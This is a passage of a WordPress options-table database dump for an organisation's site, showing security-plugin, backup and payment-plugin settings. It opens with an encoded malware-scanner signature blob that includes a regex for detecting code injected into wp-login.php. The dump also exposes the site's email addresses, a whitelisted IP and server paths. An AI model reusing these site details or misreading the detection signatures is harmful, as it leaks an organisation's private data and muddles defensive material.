BlNWQ=ZDY3ZTQ5YWRhMzM2ZGFhZjkyTzI2ODEwIjtzOjU6IkY=Mzc=IjtzOjM5OiIwM2IyMWZmYzljNzljZmI2MjQ3OTBiMGJhNDg=NjkxY=8zMjAzMzIiO3M6NToiRjVMTWIiO3M6Mzg6IjVlNjg1NWNmMDJjNGFhMGFjYzg3MDBmN2Y2MTNkZjAwTzYwMTYzIjtzOjU6IkY2RkplIjtzOjM3OiI3MWNkMTY=ODBhZGQyMGY1MTZmNDFjZjA=NTc1ZmIxOE8xODg=IjtzOjU6IkY5QTl=IjtzOjM5OiI4MzRkMjJmOGI2OGEyYzVjMDE4NjZhNDNlYjI=ZWZjNE8xOTU3MDIiO3M6NToiRkE4SGQiO31zOjI6ImpzIjthOjM=OntpOjA7czo1OiJGOUFBQiI7czozNzoiNTU=YmM3NmM3MDM1MTE4N2Y=Y2UwNWRkYzAxMmFhZWRPNDc3NiI7czo1OiJENjY3WCI7czozNzoiOWE5YzEyNTgxNGI5NzE1OTgyZDI=NmExZWU3ODA4NGZPNTM=NSI7czo1OiJENjY3WCI7czozODoiZTM2YTA4NjEyMzc1NjQxMjI5MzIzMWFlYWQxN2YyNGZPMzc2MjkiO3M6NToiRDc1QUgiO3M6Mzc6ImEzOGFjNTI2NjkyNDkzOGE=ZmY1NTE=MzY5YzZiNDBkTzQ2NzQiO3M6NToiRDc1QUoiO3M6Mzc6IjEwNDNhMWQ3ZDg=ZWU1NmY4ODMxYTYwY2RmYzVkYzI4TzcwNzciO3M6NToiRDc1RFMiO3M6Mzg6IjZlYzE1MGI3OTg3Y2FhZWY5OGI1OWM4N2I5ZjQ3MWJlTzExODQyIjtzOjU6IkUxUjJuIjtzOjM4OiI2MTQ3Y2NlZTdhZWY5ZGMwYzZlYjEwZDhkN2IzMTFmOU83MDg4MyI7czo1OiJFMVIydyI7czozNzoiYmEzMjkzOTcwZTEzYjAzYTJlYTkyZjViNmI1YmY1NDRPMzM3NyI7czo1OiJFMjJOcSI7czozNzoiNjNiMGFlZDliMDJmODc5YTZlMDI5NWZiZWE3ZGI4NTRPNDcwMiI7czo1OiJFMjMwRCI7czozNzoiZWY=MTg4Y2IwYjYwYTcyMDE3ZjRjOGExZTg=MGFiMWVPMjk1MCI7czo1OiJFMjQ5TCI7czozNzoiZmI4YmY2Nzg1ZTU1ZTllMzliZWE1NTI2MzVjNDJhNjRPMzI3MCI7czo1OiJFMjYwQyI7czozOToiYWNiMzMzMjliOWVmOGFhYmQ4YmQ3MzE=MjY4MDNlNGVPMjMyNDgyIjtzOjU6IkUyNjBFIjtzOjM4OiI2Y2ViNjQ3NTkyNTg4YmNmNDYzYmVmZDk=MDhlMjdhZE8xMjAyNSI7czo1OiJFMjYwSCI7czozNzoiNWEzMTgyNzdmZWRmNDkxYTAzMDFlMTc3YTllZjEwYjNPNDkwOCI7czo1OiJFMjYwSiI7czozODoiZGJjMzgwODQ3M2RlZjAwZmNlNDVmZTU2NGRjNzJkY2JPMTQ3MjAiO3M6NToiRTI2MEsiO3M6Mzc6ImI5ODlhNWJkODRmNmViY2JjMTM5M2VjMDAzZTZlOTkxTzQ5NjkiO3M6NToiRTI3RUciO3M6Mzg6IjAzMGI4Mzg5Mzc2YTQyZmYzZGExODZiZjY1ODA2MjE3TzE2NTMxIjtzOjU6IkUyOUQyIjtzOjM3OiJkZWYyNTdkYmIwYWI4MDVjNDk5NmZkOGFiYjFhNmI=OU82NzE3IjtzOjU6IkUySDVuIjtzOjM4OiI3NGQ5MDMwNDk2ODNlNWJiZWE5Y2NiNzU=NGE=MmJjYU8xNzQxMyI7czo1OiJFNUVEcSI7czozODoiNjAzYmQxNDI5OWY2MWE3MzI5YjJkMzUzYjJiNTZjMmZPMzc2ODkiO3M6NToiRTVFRHAiO3M6Mzc6IjA=MjZiMzk3NTRhYTZiYzc2NmQ4OWVhNGM=MWJiZDA2TzM=NTciO3M6NToiRTVFRHgiO3M6Mzg6ImVhZGM1ODMyNTEzZDU2NzA4ODRhOTc1YzZkZTEwZjAxTzE5NjE1IjtzOjU6IkU3VU1BIjtzOjM4OiIzOGRiY2M5MjU1MjkzNjg4MTJmNWMyZmJjYjM4OTYxNk8xNDk2NSI7czo1OiJFN1VNQiI7czozNzoiYTFjMTgyMjdlNmU5Mzc5OGM=OTNhZWQ5NmVlNmNjODRPMzI2NyI7czo1OiJFN1VNQiI7czozNzoiMDc4Mzg4YTY=MzFhYTViMDgzOGE4NzMyZDE4N2ZlMjlPODkxMyI7czo1OiJFOEFBcCI7czozNzoiZjNiMWIyODQyNDM2ZjdhMzExYjM5ZTRlZjRiNDdmNTlPNDM1MiI7czo1OiJFOEJCVSI7czozNzoiZDcwOTQwNjE5YTk5ZDU1NTExNjE2N2Q=ZmIzOWNhMTVPNDM5NyI7czo1OiJFOUNMeCI7czozODoiY2JkYmZjOTE4NGQyOGFjNTVmODNjMGIwZGY=MGZkNDNPNzk=MTQiO3M6NToiRTlHOGoiO3M6Mzg6ImVmM2FlOTAxNDUyNWNmODExODdhZmFhNjFiY2E3MzdlTzM3NjkxIjtzOjU6IkVDQ=UxIjtzOjM4OiJmNDQ4YzU5M2MyNDJkMTM=ZTk3MzNhODRjN2E=ZDI2Y=8xNTI=OCI7czo1OiJFQ=g5WCI7czozOToiNTFiYmEwZDUzMzNkZTRmZGEwOTU=ZjUxZWEzNTVhNTBPMTA2Nzk3IjtzOjU6IkYyQThVIjtzOjM4OiI2OTJmOGU4NjFiYWZhMzFmYmYxYjM4MDViNGIwZDdkM=8xNTAxNiI7czo1OiJGNDZJaCI7czozODoiZDg=MjMzZGQyOTM3MTdmMGEwN2I1NThiMmZlMzhmNTZPMTUwNTMiO3M6NToiRjlBQUIiO319czo4OiJ3cF9sb2dpbiI7YToxOntzOjM2OiJicnV=ZSBmb3JjZSBwb3NzaWJsZSBvbiB3cC1sb2dpbi5waHAiO2E6Mjp7aTowO3M6NToiRDRPQUIiO2k6MTtzOjE3NToiLy4qP3JlcXVpcmVcKFsgXHRdKmRpcm5hbWVcKF9fRklMRV9fXClbIFx=XSpcLlsgXHRdKlsiJ11cL3dwXC1sb2FkXC5waHBbIiddWyBcdF=qXCk7KD8hXC9cLzIwMTMtMDQtMjQgRE8gTk9UIFJFTU9WRSBUSElTIFJFUVVJUkVEIExJTkUpW15cbl=qKFtcclxuIFx=XSpcJF9TRVNTSU9OXFtbXjtdKzspKi9pcyI7fX191','yes'),(71624,'widget_wp_statistics_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(53991,'ninja_forms_optin_admin_email','1','yes'),(511256,'_site_transient_itsec_wp_upload_dir','a:6:{s:4:\"path\";s:54:\"/home2/zphiblgz/public_html/wp-content/uploads/2021/09\";s:3:\"url\";s:47:\"https://zphiblgz.org/wp-content/uploads/2021/09\";s:6:\"subdir\";s:8:\"/2021/09\";s:7:\"basedir\";s:46:\"/home2/zphiblgz/public_html/wp-content/uploads\";s:7:\"baseurl\";s:39:\"https://zphiblgz.org/wp-content/uploads\";s:5:\"error\";b:0;}','no'),(511255,'_site_transient_timeout_itsec_wp_upload_dir','1632425019','no'),(55648,'itsec_temp_whitelist_ip','a:1:{s:12:\"71.120.26.35\";i:1632424532;}','no'),(55653,'itsec_active_modules','a:10:{s:9:\"ban-users\";b:1;s:6:\"backup\";b:1;s:11:\"brute-force\";b:1;s:19:\"network-brute-force\";b:1;s:16:\"wordpress-tweaks\";b:1;s:13:\"404-detection\";b:1;s:3:\"ssl\";b:1;s:11:\"file-change\";b:1;s:9:\"away-mode\";b:0;s:13:\"system-tweaks\";b:1;}','yes'),(56926,'wpeevent_settingsoptions','a:23:{s:8:\"currency\";s:2:\"25\";s:8:\"language\";s:1:\"3\";s:11:\"liveaccount\";s:0:\"\";s:14:\"sandboxaccount\";s:0:\"\";s:4:\"mode\";s:1:\"2\";s:13:\"show_currency\";s:1:\"0\";s:4:\"size\";s:1:\"2\";s:5:\"opens\";s:1:\"2\";s:7:\"no_note\";s:1:\"1\";s:11:\"no_shipping\";s:1:\"1\";s:20:\"admin_email_template\";s:150:\"You have received an order from {payer_email} <br /><br /> You Sold: <br /> {sold_table} <br /> Payment Total - {txn_total} <br /> PayPal ID: {txn_id}\";s:23:\"customer_email_template\";s:224:\"Thank you for your purchase. Your order is now complete. <br /><br /> <strong>Your ticket details:</strong><br /> {sold_table} <br /> <strong>Payment Total</strong> - {txn_total} <br /> <strong> QR Code:</strong> - {qr_code}\";s:13:\"admin_subject\";s:33:\"New Customer Order - #{order_num}\";s:16:\"customer_subject\";s:29:\"Order Complete - #{order_num}\";s:6:\"cancel\";s:0:\"\";s:6:\"return\";s:0:\"\";s:4:\"note\";s:1:\"1\";s:12:\"upload_image\";s:0:\"\";s:16:\"send_admin_email\";s:1:\"1\";s:10:\"admin_from\";s:9:\"WordPress\";s:11:\"admin_email\";s:15:\"pr@zphiblgz.org\";s:14:\"admin_cc_email\";s:0:\"\";s:19:\"send_customer_email\";s:1:\"1\";}','yes'),(56950,'cf7pp_options','a:8:{s:8:\"currency\";s:2:\"25\";s:8:\"language\";s:1:\"3\";s:11:\"liveaccount\";s:19:\"paypal@zphiblgz.org\";s:14:\"sandboxaccount\";s:0:\"\";s:4:\"mode\";s:1:\"2\";s:6:\"cancel\";s:16:\"www.zphiblgz.org\";s:6:\"return\";s:16:\"www.zphiblgz.org\";s:8:\"redirect\";s:1:\"2\";}','yes'),(56949,'wpcf7','a:2:{s:7:\"version\";s:5:\"5.4.2\";s:13:\"bulk_validate\";a:4:{s:9:\"timestamp\";i:1601255385;s:7:\"version\";s:5:\"5.2.2\";s:11:\"count_valid\";i:0;s:13:\"count_invalid\";i:0;}}','yes'),(73968,'widget_swiftype_search_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(56992,'woocommerce_store_address','','yes'),(56993,'woocommerce_store_address_2','','yes'),(56994,'woocommerce_store_city','','yes'),(56995,'woocommerce_store_postcode','','yes'),(56996,'woocommerce_enable_reviews','yes','yes'),(56997,'woocommerce_shipping_debug_mode','no','no'),(56176,'icwp_wpsf_admin_access_restriction_options','a:13:{s:31:\"enable_admin_access_restriction\";s:1:\"N\";s:20:\"admin_access_timeout\";i:30;s:16:\"admin_access_key\";s:0:\"\";s:29:\"admin_access_restrict_plugins\";a:0:{}s:28:\"admin_access_restrict_themes\";a:0:{}s:27:\"admin_access_restrict_posts\";a:0:{}s:18:\"help_video_options\";a:0:{}s:29:\"admin_access_restrict_options\";s:1:\"Y\";s:33:\"admin_access_restrict_admin_users\";s:1:\"N\";s:17:\"whitelabel_enable\";s:1:\"N\";s:14:\"wl_menuiconurl\";s:0:\"\";s:19:\"wl_dashboardlogourl\";s:0:\"\";s:15:\"sec_admin_users\";a:0:{}}','yes'),(56177,'icwp_wpsf_license_options','a:4:{s:11:\"license_key\";s:0:\"\";s:12:\"license_data\";a:0:{}s:20:\"license_activated_at\";i:0;s:18:\"wphashes_api_token\";a:0:{}}','yes'),(56178,'icwp_wpsf_firewall_options','a:16:{s:15:\"enable_firewall\";s:1:\"Y\";s:21:\"include_cookie_checks\";s:1:\"N\";s:21:\"page_params_whitelist\";s:0:\"\";s:16:\"whitelist_admins\";s:1:\"N\";s:19:\"block_dir_traversal\";s:1:\"Y\";s:17:\"block_sql_queries\";s:1:\"Y\";s:21:\"block_wordpress_terms\";s:1:\"N\";s:22:\"block_field_truncation\";s:1:\"Y\";s:14:\"block_php_code\";s:1:\"N\";s:20:\"block_leading_schema\";s:1:\"N\";s:16:\"block_aggressive\";s:1:\"N\";s:22:\"block_exe_file_uploads\";s:1:\"N\";s:16:\"text_firewalldie\";s:7:\"default\";s:18:\"help_video_options\";a:0:{}s:14:\"block_response\";s:20:\"redirect_die_message\";s:16:\"block_send_email\";s:1:\"N\";}','yes'),(55995,'ninja_forms_optin_reported','1','yes'),(56034,'updraftplus-addons_siteid','38a963a5a7a81d7c424c9758977b13f8','no'),(56101,'updraft_interval','monthly','yes'),(56102,'updraft_retain','2','yes'),(56105,'updraft_interval_database','monthly','yes'),(56106,'updraft_retain_db','2','yes'),(56107,'updraft_service','email','yes'),(56108,'updraft_include_plugins','1','yes'),(56109,'updraft_include_themes','1','yes'),(56110,'updraft_include_uploads','1','yes'),(56111,'updraft_include_uploads_exclude','backup*,*backups,backwpup*,wp-clone,snapshots','yes'),(56112,'updraft_include_others','1','yes'),(56113,'updraft_include_others_exclude','upgrade,cache,updraft,backup*,*backups,mysql.sql,debug.log','yes'),(56114,'updraft_split_every','400','yes'),(56115,'updraft_delete_local','1','yes'),(56116,'updraft_dir','updraft','yes'),(56117,'updraft_debug_mode','0','yes'),(56118,'updraft_ssl_useservercerts','0','yes'),(56119,'updraft_ssl_disableverify','0','yes'),(56120,'updraft_ssl_nossl','0','yes'),(56121,'updraft_lastmessage','The backup attempt has finished, apparently unsuccessfully (Sep 17 07:44:24)','yes'),(509159,'updraft_jobdata_4e22b698538c','a:41:{s:15:\"resume_interval\";i:300;s:8:\"job_type\";s:6:\"backup\";s:9:\"jobstatus\";s:14:\"clouduploading\";s:11:\"backup_time\";i:1631858307;s:11:\"job_time_ms\";d:1631858307.6944229602813720703125;s:7:\"service\";a:1:{i:0;s:5:\"email\";}s:11:\"split_every\";i:400;s:11:\"maxzipbatch\";i:209715200;s:17:\"job_file_entities\";a:4:{s:7:\"plugins\";a:1:{s:5:\"index\";i:0;}s:6:\"themes\";a:1:{s:5:\"index\";i:0;}s:7:\"uploads\";a:1:{s:5:\"index\";i:1;}s:6:\"others\";a:1:{s:5:\"index\";i:0;}}s:12:\"option_cache\";a:4:{s:25:\"updraft_ssl_disableverify\";s:1:\"0\";s:17:\"updraft_ssl_nossl\";s:1:\"0\";s:26:\"updraft_ssl_useservercerts\";s:1:\"0\";s:13:\"updraft_email\";s:15:\"pr@zphiblgz.org\";}s:18:\"uploaded_lastreset\";i:9;s:8:\"one_shot\";b:0;s:18:\"followsups_allowed\";b:1;s:15:\"backup_database\";a:1:{s:2:\"wp\";a:2:{s:6:\"status\";s:8:\"finished\";s:6:\"dbinfo\";a:0:{}}}s:12:\"backup_files\";s:8:\"finished\";s:12:\"runs_started\";a:11:{i:0;d:1631858307.8289849758148193359375;i:1;d:1631859152.568624019622802734375;i:2;d:1631860146.2512700557708740234375;i:3;d:1631862879.29907894134521484375;i:4;d:1631865122.2161159515380859375;i:5;d:1631870768.082107067108154296875;i:6;d:1631873883.0145161151885986328125;i:7;d:1631874687.7695560455322265625;i:8;d:1631875668.2280991077423095703125;i:9;d:1631877894.5688569545745849609375;i:10;d:1631882663.99246501922607421875;}s:18:\"current_resumption\";i:10;s:6:\"binzip\";s:12:\"/usr/bin/zip\";s:22:\"filecreating_substatus\";a:3:{s:1:\"e\";s:6:\"others\";s:1:\"i\";i:4;s:1:\"t\";i:4;}s:19:\"files_enumerated_at\";a:4:{s:7:\"plugins\";i:1631858307;s:6:\"themes\";i:1631858329;s:7:\"uploads\";i:1631858330;s:6:\"others\";i:1631858368;}s:8:\"warnings\";a:2:{s:47:\"toobigforemail_2676ecf6b37111e81e68e7427209be98\";s:301:\"Email: backup_2021-09-17-0058_Zeta_Phi_Beta_Sorority_Inc_Lam_4e22b698538c-plugins.zip: This backup archive is 58.9 MB in size - the attempt to send this via email is likely to fail (few email servers allow attachments of this size). If so, you should switch to using a different remote storage method.\";s:16:\"infrequentvisits\";s:215:\"Your website is visited infrequently and UpdraftPlus is not getting the resources it hoped for; please read this page: https://updraftplus.com/faqs/why-am-i-getting-warnings-about-my-site-not-having-enough-visitors/\";}s:9:\"run_times\";a:1:{i:0;d:71.282012939453125;}s:15:\"useful_checkins\";a:1:{i:0;i:0;}s:13:\"sha1-plugins0\";s:40:\"630b9b3ee9b3991a27f5f5c404bd003775f0ac51\";s:15:\"sha256-plugins0\";s:64:\"c2ff5045d3e17b7c907908627224b9cdf822929aa58a1137d6bcf6c734fb1ae3\";s:12:\"sha1-themes0\";s:40:\"3af338c492bdcf76a2d7bb2f57fd7c77e224eee2\";s:14:\"sha256-themes0\";s:64:\"76e84af77f248bd59fff9c30840efe80af774641c90fe2bc20f1aa2e91f06013\";s:13:\"sha1-uploads0\";s:40:\"363dec917ab35f124442325d123f295800ff4139\";s:15:\"sha256-uploads0\";s:64:\"4bb54afe8302744925a6573fdb6bb95b0a6cc0de4f2bbf92613a9a969f2ab078\";s:13:\"sha1-uploads1\";s:40:\"fdca3c1bee4bce4f97576f19176878823478f8ec\";s:15:\"sha256-uploads1\";s:64:\"b9a37435a9564cb6640c620830dae1fb372a3176f719af3bcb6cf756b5081e90\";s:12:\"sha1-others0\";s:40:\"7d015dca6c4a105c87af25f8bd134bec7002cfc7\";s:14:\"sha256-others0\";s:64:\"2614e9dd1df35b7d0c0d802dba3f639ed44f1e4fd1494094007fd359c819d2f3\";s:18:\"backup_files_array\";a:9:{s:7:\"plugins\";a:1:{i:0;s:78:\"backup_2021-09-17-0058_Zeta_Phi_Beta_Sorority_Inc_Lam_4e22b698538c-plugins.zip\";}s:12:\"plugins-size\";i:61800494;s:6:\"themes\";a:1:{i:0;s:77:\"backup_2021-09-17-0058_Zeta_Phi_Beta_Sorority_Inc_Lam_4e22b698538c-themes.zip\";}s:11:\"themes-size\";i:9383767;s:7:\"uploads\";a:2:{i:0;s:78:\"backup_2021-09-17-0058_Zeta_Phi_Beta_Sorority_Inc_Lam_4e22b698538c-uploads.zip\";i:1;s:79:\"backup_2021-09-17-0058_Zeta_Phi_Beta_Sorority_Inc_Lam_4e22b698538c-uploads2.zip\";}s:12:\"uploads-size\";i:385137532;s:13:\"uploads1-size\";i:234599946;s:6:\"others\";a:1:{i:0;s:77:\"backup_2021-09-17-0058_Zeta_Phi_Beta_Sorority_Inc_Lam_4e22b698538c-others.zip\";}s:11:\"others-size\";i:131099794;}s:10:\"binsqldump\";s:18:\"/usr/bin/mysqldump\";s:20:\"dbcreating_substatus\";a:3:{s:1:\"t\";s:18:\"lwz_yoast_seo_meta\";s:1:\"i\";i:131;s:1:\"a\";i:131;}s:10:\"fetch_rows\";i:1000;s:8:\"sha1-db0\";s:40:\"a7654f6e7cb4f65a3b699bf3d6ba9b8f2450dbf5\";s:10:\"sha256-db0\";s:64:\"2255cad9f21311848e18545d9a94fc88cdf94ecfe61c714b1c599c4b8708a6dc\";s:19:\"uploading_substatus\";a:3:{s:1:\"i\";i:0;s:1:\"p\";i:0;s:1:\"t\";i:6;}s:14:\"fail_on_resume\";i:10;}','no'),(56122,'updraftplus_locked_fd','1','no'),(56123,'updraftplus_last_lock_time_fd','2021-09-17 05:58:27','no'),(56124,'updraftplus_semaphore_fd','1','no'),(56125,'updraft_last_scheduled_fd','1631858307','yes'),(56086,'updraft_updraftvault','a:2:{s:7:\"version\";i:1;s:8:\"settings\";a:1:{s:34:\"s-f5c9296612cc76284262715f97b76eb8\";a:0:{}}}','yes'),(56088,'updraft_s3','a:2:{s:7:\"version\";s:1:\"1\";s:8:\"settings\";a:1:{s:34:\"s-a21b42f8873c72e404792093ea95b6fb\";a:4:{s:8:\"endpoint\";s:0:\"\";s:9:\"accesskey\";s:0:\"\";s:9:\"secretkey\";s:0:\"\";s:4:\"path\";s:0:\"\";}}}','yes'),(56089,'updraft_cloudfiles','a:2:{s:7:\"version\";s:1:\"1\";s:8:\"settings\";a:1:{s:34:\"s-7bc0fe178b0bd1ee8e262966a249bd7d\";a:5:{s:7:\"authurl\";s:12:\"US (default)\";s:6:\"region\";s:3:\"DFW\";s:4:\"user\";s:0:\"\";s:6:\"apikey\";s:0:\"\";s:4:\"path\";s:0:\"\";}}}','yes'),(56090,'updraft_googledrive','a:2:{s:7:\"version\";i:1;s:8:\"settings\";a:1:{s:34:\"s-e89d1412f270b1e3203c46027caf8cf0\";a:1:{s:6:\"folder\";s:11:\"UpdraftPlus\";}}}','yes'),(56091,'updraft_ftp','a:2:{s:7:\"version\";s:1:\"1\";s:8:\"settings\";a:1:{s:34:\"s-0b56491360de6ae722948b0147ef5ae2\";a:5:{s:4:\"host\";s:0:\"\";s:4:\"user\";s:0:\"\";s:4:\"pass\";s:0:\"\";s:4:\"path\";s:0:\"\";s:7:\"passive\";s:1:\"1\";}}}','yes'),(56092,'updraft_s3generic','a:2:{s:7:\"version\";s:1:\"1\";s:8:\"settings\";a:1:{s:34:\"s-7a3c4c76441c22bdf4d23bab32871664\";a:4:{s:8:\"endpoint\";s:0:\"\";s:9:\"accesskey\";s:0:\"\";s:9:\"secretkey\";s:0:\"\";s:4:\"path\";s:0:\"\";}}}','yes'),(56093,'updraft_openstack','a:2:{s:7:\"version\";s:1:\"1\";s:8:\"settings\";a:1:{s:34:\"s-31be43f74462353a2611c31aa6a2b539\";a:6:{s:7:\"authurl\";s:0:\"\";s:6:\"tenant\";s:0:\"\";s:6:\"region\";s:0:\"\";s:4:\"user\";s:0:\"\";s:8:\"password\";s:0:\"\";s:4:\"path\";s:0:\"\";}}}','yes'),(56094,'updraft_dreamobjects','a:2:{s:7:\"version\";s:1:\"1\";s:8:\"settings\";a:1:{s:34:\"s-4293b8e09d5969335fb5a33b13299d01\";a:4:{s:8:\"endpoint\";s:26:\"objects-us-west-1.dream.io\";s:9:\"accesskey\";s:0:\"\";s:9:\"secretkey\";s:0:\"\";s:4:\"path\";s:0:\"\";}}}','yes'),(56095,'updraft_retain_extrarules','a:0:{}','yes'),(56096,'updraft_email','pr@zphiblgz.org','yes'),(56097,'updraft_report_warningsonly','a:0:{}','yes'),(56098,'updraft_report_wholebackup','a:0:{}','yes'),(56099,'updraft_extradbs','a:0:{}','yes'),(56100,'updraft_include_more_path','a:0:{}','yes'),(56067,'updraft_backup_history','a:49:{i:1631858307;a:20:{s:7:\"plugins\";a:1:{i:0;s:78:\"backup_2021-09-17-0058_Zeta_Phi_Beta_Sorority_Inc_Lam_4e22b698538c-plugins.zip\";}s:12:\"plugins-size\";i:61800494;s:6:\"themes\";a:1:{i:0;s:77:\"backup_2021-09-17-0058_Zeta_Phi_Beta_Sorority_Inc_Lam_4e22b698538c-themes.zip\";}s:11:\"themes-size\";i:9383767;s:7:\"uploads\";a:2:{i:0;s:78:\"backup_2021-09-17-0058_Zeta_Phi_Beta_Sorority_Inc_Lam_4e22b698538c-uploads.zip\";i:1;s:79:\"backup_2021-09-17-0058_Zeta_Phi_Beta_Sorority_Inc_Lam_4e22b698538c-uploads2.zip\";}s:12:\"uploads-size\";i:385137532;s:13:\"uploads1-size\";i:234599946;s:6:\"others\";a:1:{i:0;s:77:\"backup_2021-09-17-0058_Zeta_Phi_Beta_Sorority_Inc_Lam_4e22b698538c-others.zip\";}s:11:\"others-size\";i:131099794;s:2:\"db\";s:72:\"backup_2021-09-17-0058_Zeta_Phi_Beta_Sorority_Inc_Lam_4e22b698538c-db.gz\";s:7:\"db-size\";i:2451642;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:6:{s:8:\"plugins0\";s:40:\"630b9b3ee9b3991a27f5f5c404bd003775f0ac51\";s:7:\"themes0\";s:40:\"3af338c492bdcf76a2d7bb2f57fd7c77e224eee2\";s:8:\"uploads0\";s:40:\"363dec917ab35f124442325d123f295800ff4139\";s:8:\"uploads1\";s:40:\"fdca3c1bee4bce4f97576f19176878823478f8ec\";s:7:\"others0\";s:40:\"7d015dca6c4a105c87af25f8bd134bec7002cfc7\";s:3:\"db0\";s:40:\"a7654f6e7cb4f65a3b699bf3d6ba9b8f2450dbf5\";}s:6:\"sha256\";a:6:{s:8:\"plugins0\";s:64:\"c2ff5045d3e17b7c907908627224b9cdf822929aa58a1137d6bcf6c734fb1ae3\";s:7:\"themes0\";s:64:\"76e84af77f248bd59fff9c30840efe80af774641c90fe2bc20f1aa2e91f06013\";s:8:\"uploads0\";s:64:\"4bb54afe8302744925a6573fdb6bb95b0a6cc0de4f2bbf92613a9a969f2ab078\";s:8:\"uploads1\";s:64:\"b9a37435a9564cb6640c620830dae1fb372a3176f719af3bcb6cf756b5081e90\";s:7:\"others0\";s:64:\"2614e9dd1df35b7d0c0d802dba3f639ed44f1e4fd1494094007fd359c819d2f3\";s:3:\"db0\";s:64:\"2255cad9f21311848e18545d9a94fc88cdf94ecfe61c714b1c599c4b8708a6dc\";}}s:5:\"nonce\";s:12:\"4e22b698538c\";s:7:\"service\";a:1:{i:0;s:5:\"email\";}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";a:4:{s:7:\"plugins\";i:1631858307;s:6:\"themes\";i:1631858329;s:7:\"uploads\";i:1631858330;s:6:\"others\";i:1631858368;}s:18:\"created_by_version\";s:7:\"1.16.46\";s:21:\"last_saved_by_version\";s:7:\"1.16.46\";s:12:\"is_multisite\";b:0;}i:1629266476;a:20:{s:7:\"plugins\";a:1:{i:0;s:78:\"backup_2021-08-18-0101_Zeta_Phi_Beta_Sorority_Inc_Lam_b9119ed69d3d-plugins.zip\";}s:12:\"plugins-size\";i:61800494;s:6:\"themes\";a:1:{i:0;s:77:\"backup_2021-08-18-0101_Zeta_Phi_Beta_Sorority_Inc_Lam_b9119ed69d3d-themes.zip\";}s:11:\"themes-size\";i:9383767;s:7:\"uploads\";a:2:{i:0;s:78:\"backup_2021-08-18-0101_Zeta_Phi_Beta_Sorority_Inc_Lam_b9119ed69d3d-uploads.zip\";i:1;s:79:\"backup_2021-08-18-0101_Zeta_Phi_Beta_Sorority_Inc_Lam_b9119ed69d3d-uploads2.zip\";}s:12:\"uploads-size\";i:388664934;s:13:\"uploads1-size\";i:231072384;s:6:\"others\";a:1:{i:0;s:77:\"backup_2021-08-18-0101_Zeta_Phi_Beta_Sorority_Inc_Lam_b9119ed69d3d-others.zip\";}s:11:\"others-size\";i:131099794;s:2:\"db\";s:72:\"backup_2021-08-18-0101_Zeta_Phi_Beta_Sorority_Inc_Lam_b9119ed69d3d-db.gz\";s:7:\"db-size\";i:2423470;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:6:{s:8:\"plugins0\";s:40:\"a021733d1bf773574023bfa7feb8f123a3fd452f\";s:7:\"themes0\";s:40:\"8d177c191b0f27532cdf77b260a6bd68e82e2e2f\";s:8:\"uploads0\";s:40:\"264074455dcd70a742280add9b5a3c8524a0d199\";s:8:\"uploads1\";s:40:\"23a2b0c980c54bb10080199548999f794bb49de2\";s:7:\"others0\";s:40:\"e9b32843e3f289e0275de87fc6bfd20780e63a5c\";s:3:\"db0\";s:40:\"0d3811b66b92e1508e1b70d265f05f569f2aaf43\";}s:6:\"sha256\";a:6:{s:8:\"plugins0\";s:64:\"c187065ead63493759576956b1aea07d7b0a872af2b2eb2bbbca1d51bff2aac1\";s:7:\"themes0\";s:64:\"b8d0499f5eb9632fabe5b441113960d5550b3473fb62150405f620946745f766\";s:8:\"uploads0\";s:64:\"d48298a5fc07f173d34b4fc9746649e685b07573019ebacfc94eb2026dfa4d13\";s:8:\"uploads1\";s:64:\"2805cdbf0fcb9943b7a35466aabbe0c92fed4d1b74180b6a5ce5f5de8e8844c5\";s:7:\"others0\";s:64:\"92ee50db9a1b2c387c1c3f1a96087f79bd6047985e26d8eeaad9e4a44d28486c\";s:3:\"db0\";s:64:\"54c18665ac6018a52a2a281222a2558c842c2df741bcfdc17ff32646bb87ec59\";}}s:5:\"nonce\";s:12:\"b9119ed69d3d\";s:7:\"service\";a:1:{i:0;s:5:\"email\";}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";a:4:{s:7:\"plugins\";i:1629266477;s:6:\"themes\";i:1629266496;s:7:\"uploads\";i:1629266497;s:6:\"others\";i:1629266539;}s:18:\"created_by_version\";s:7:\"1.16.46\";s:21:\"last_saved_by_version\";s:7:\"1.16.46\";s:12:\"is_multisite\";b:0;}i:1626676567;a:20:{s:7:\"plugins\";a:1:{i:0;s:78:\"backup_2021-07-19-0136_Zeta_Phi_Beta_Sorority_Inc_Lam_6d54ee4bec26-plugins.zip\";}s:12:\"plugins-size\";i:61756441;s:6:\"themes\";a:1:{i:0;s:77:\"backup_2021-07-19-0136_Zeta_Phi_Beta_Sorority_Inc_Lam_6d54ee4bec26-themes.zip\";}s:11:\"themes-size\";i:9383767;s:7:\"uploads\";a:2:{i:0;s:78:\"backup_2021-07-19-0136_Zeta_Phi_Beta_Sorority_Inc_Lam_6d54ee4bec26-uploads.zip\";i:1;s:79:\"backup_2021-07-19-0136_Zeta_Phi_Beta_Sorority_Inc_Lam_6d54ee4bec26-uploads2.zip\";}s:12:\"uploads-size\";i:388664774;s:13:\"uploads1-size\";i:231072384;s:6:\"others\";a:1:{i:0;s:77:\"backup_2021-07-19-0136_Zeta_Phi_Beta_Sorority_Inc_Lam_6d54ee4bec26-others.zip\";}s:11:\"others-size\";i:131099792;s:2:\"db\";s:72:\"backup_2021-07-19-0136_Zeta_Phi_Beta_Sorority_Inc_Lam_6d54ee4bec26-db.gz\";s:7:\"db-size\";i:2407600;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:6:{s:8:\"plugins0\";s:40:\"02451f66613395e25edb0ac8e55dc7923421bf84\";s:7:\"themes0\";s:40:\"affe61a84ae42b89cb9b0d4f4feb5cc0439b0c7a\";s:8:\"uploads0\";s:40:\"96cf21872394416b4c88cc85798076038088b2d8\";s:8:\"uploads1\";s:40:\"5232d6bd57b3eba7538799dc572de4e94c22edde\";s:7:\"others0\";s:40:\"17932f324ac2f2df42bf85464450b4488eea71b6\";s:3:\"db0\";s:40:\"77abe23dc9acfd85d5f7ed87f64d41650558ee48\";}s:6:\"sha256\";a:6:{s:8:\"plugins0\";s:64:\"898db5f7bb70dcc21a2d55fa528f3e7057203fd75c73740abc0ad6c658c92669\";s:7:\"themes0\";s:64:\"4a644e1d1e5532b2c65d418aedd2d7d